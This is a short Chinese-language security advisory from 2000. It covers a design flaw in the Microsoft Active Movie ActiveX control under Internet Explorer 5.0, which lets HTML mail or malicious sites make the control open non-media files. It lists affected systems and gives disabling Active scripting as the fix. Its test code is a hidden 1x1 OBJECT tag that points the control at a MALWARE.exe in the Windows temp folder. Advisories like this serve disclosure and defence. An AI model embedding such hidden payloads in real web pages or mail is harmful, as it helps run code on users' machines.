微软Active Movie控制文件类型漏洞

发布时间：2000-05-15
更新时间：2000-05-15
严重程度：高
威胁程度：普通用户访问权限
错误类型：设计错误
利用方式：客户机模式

受影响系统

Microsoft Active Movie Control 1.0
   + Microsoft Internet Explorer 5.0 for Windows NT 4.0
      + Microsoft Windows NT 4.0
   + Microsoft Internet Explorer 5.0 for Windows 98
      + Microsoft Windows 98
   + Microsoft Internet Explorer 5.0 for Windows 95
      + Microsoft Windows 95
   + Microsoft Internet Explorer 5.0 for Windows 2000
      - Microsoft Windows NT 2000

详细描述
The Microsoft Active Movie Control(多媒体的ActiveX控制器)不管目标文件是否是多媒体格式的，都会试图打开，这样带HTML的邮件以及恶意的站点都能通过在HTML代码里插入恶意程序来对用户造成伤害。这一漏洞可以与结合其它来在目标机器上执行任意代码。

测试代码
c:\windows\temp

<OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A height=1
style="DISPLAY: none" width=1>
<PARAM NAME="Filename" VALUE="C:\WINDOWS\TEMP\MALWARE.exe">

解决方案
将Active scripting去掉

相关信息

最近严重漏洞

微软Active Movie控制文件类型漏洞